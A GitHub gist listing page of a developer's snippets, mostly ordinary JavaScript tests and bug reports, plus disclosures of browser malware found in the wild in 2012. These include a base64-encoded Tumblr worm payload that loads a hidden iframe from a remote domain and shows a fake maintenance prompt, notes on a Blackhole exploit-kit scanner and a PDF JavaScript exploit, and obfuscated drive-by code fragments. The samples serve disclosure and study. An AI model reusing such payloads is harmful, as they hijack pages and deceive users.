Skip to content

Instantly share code, notes, and snippets.

scottschiller / gist:4196142
Created Dec 3, 2012
Possible Tumblr exploit found in the wild, 12/03/2012
View gist:4196142
<div class="the-video hideflash"><script src="data:text/plain;base64,dmFyIGZyYW1la2lsbGVyID0gdHJ1ZTsNCg0Kd2luZG93Lm9ubG9hZCA9IGZ1bmN0aW9uKCl7DQogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsYXBwZXInKS5zcmMgPSAiaHR0cDovL2kuaG9wZS55b3UuZ2V0LnN0cmFuZ2xlZC5uZXQiOw0KfQ0KDQp3aW5kb3cub25iZWZvcmV1bmxvYWQgPSBmdW5jdGlvbigpIHsgDQogIGlmKGZyYW1la2lsbGVyKSB7DQogICAgcmV0dXJuICJOb3RpY2U6IFR1bWJsciB3aWxsIGJlIHVuZGVyZ29pbmcgbWFpbnRlbmFuY2Ugb24gRGVjZW1iZXIgNHRoIDIwMTIgYXQgMDE6MDAgQU0gZm9yIHNldmVyYWwgaG91cnMuXG5cbiBXZSBjYW5ub3QgZm9yZWNhc3QgZm9yIGV4YWN0bHkgaG93IGxvbmcsIHVuZm9ydHVuYXRlbHkuXG4gV2UgYXBvbG9naXplIGZvciB0aGUgaW5jb252ZW5pZW5jZS5cblxuWW91IG1heSBub3cgZGlzbWlzcyB0aGlzIG1lc3NhZ2UgdmlhICdDYW5jZWwvU3RheSBvbiB0aGlzIHBhZ2UnLiBUaGFuayB5b3UuIjsgIC8vIGFueSBtZXNzYWdlIHRoYXQgaGVscHMgdXNlciB0byBtYWtlIGRlY2lzaW9uDQogIH0NCn07"></script><iframe id="lapper" width="0" height="0" style="opacity: 0;"></iframe></div>
var framekiller = true;
window.onload = function(){
document.getElementById('lapper').src = "
scottschiller / malware.js
Created Nov 15, 2012
"Blackhole" Flash + Adobe PDF Reader + Java/getJavaInfo.jar web exploit found in the wild, 11/15/2012
View malware.js
* Looks as though this thing scans for vulnerable versions of Flash, Adobe PDF Reader and Java plugins.
* Oddly, the functions j1/j2/p1/p2/f1/f2 (which would presumably do the dirty work) are empty.
* It's worth noting that the hosting (bad) page says "Please wait, you will be forwarded / IE and Firefox-compatible only".
* Allegedly this is part of the "Blackhole Exploit Kit".
* Related details / video etc.:
View gist:2890589
<!-- Flickr is made of, by and for humans: Here are 17 signs of empathy in the form of loading messages. ;) -->
Reticulating splines...
Frobulating widgets...
Engaging Tuna Blaster...
Firing up the engines...
Herding pandas...
Questioning the Magic Donkey...
Your machine is learning our ways
scottschiller / yui3-loader-test.html
Created May 8, 2012
YUI 3.5.1 loader test (IE 9, quirks mode DTD)
View yui3-loader-test.html
Lack of DTD means quirks mode in IE 9, and YUI 3.5.1 will fail to load module dependencies due to <script>.onload not being supported. <script>.onreadystatechange should instead be used when document.documentMode < 9, which means IE 9 rendering a page in quirks mode, IE 7 or IE 8 standards mode.
<script src=""></script>
// Create a YUI sandbox on your page.
YUI().use('node', 'event', function (Y) {
// The Node and Event modules are loaded and ready to use.
scottschiller / gist:2623390
Created May 6, 2012 — forked from spadgos/gist:2561726
Recreating a SoundManager bug / fixed testcase
View gist:2623390
report URL:
related SM2 fix/commit:
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Soundmanager test</title>
<!-- you'll have to correct the paths to SoundManager to get it working for yourself -->
<script>window.SM2_DEFER = true;</script>
scottschiller / gist:2142215
Created Mar 20, 2012
JavaScript PDF exploit found in the wild, 03/20/2012
View gist:2142215
I got this PDF as an email attachment.
The PDF file included a JavaScript block defining an array, and some encoded (for example, &#123;) character entries underneath defining the function responsible for decoding and running it.
The interesting part of the PDF where the script started:
<test:script contentType='&#97;&#0112;plication/&#120;-javascript'>
That was followed by the array data (not encoded), and then this block:
scottschiller / malware.html
Created Feb 28, 2012
Browser malware found in the wild, 02/28/2012
View malware.html
<!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. -->
<!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. -->
<!-- commented out to prevent accidental execution, too. -->
try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;}
try{new btoa({});}catch(qqq){
scottschiller / gist:1187837
Created Sep 2, 2011
Closure compiler "INTERNAL COMPILER ERROR" with soundmanager2-nodebug.js (Compiler version 1346)
View gist:1187837
[ Report for Google Closure Compiler folks, internal compiler error on routinely-compressed JS ]
Source file used:
Reporting this per instructions in the compiler output.
For what it's worth, compilation has previously been successful until I updated the compiler to the build below.
This version of the compiler fails:
Closure Compiler (
scottschiller / js-ball-collision.html
Created Jul 10, 2011
A collision-enabled variant of my JavaScript Animation Demo #2, feature added at the request of a public school technology teacher who wrote in. (Teachers showing kids JavaScript in high school FTW! :P)
View js-ball-collision.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<html xmlns="" lang="en" xml:lang="en">
<style type="text/css">
body {
font:76% normal verdana,arial,tahoma;
scottschiller / normalized-addremove.html
Created Sep 26, 2010
Somewhat-normalized event listener handling (DOM2)
View normalized-addremove.html
<title>Somewhat-normalized event add/remove</title>
var addEvent, removeEvent;
(function() {
* Somewhat-normalized event add/remove (old IE/W3C)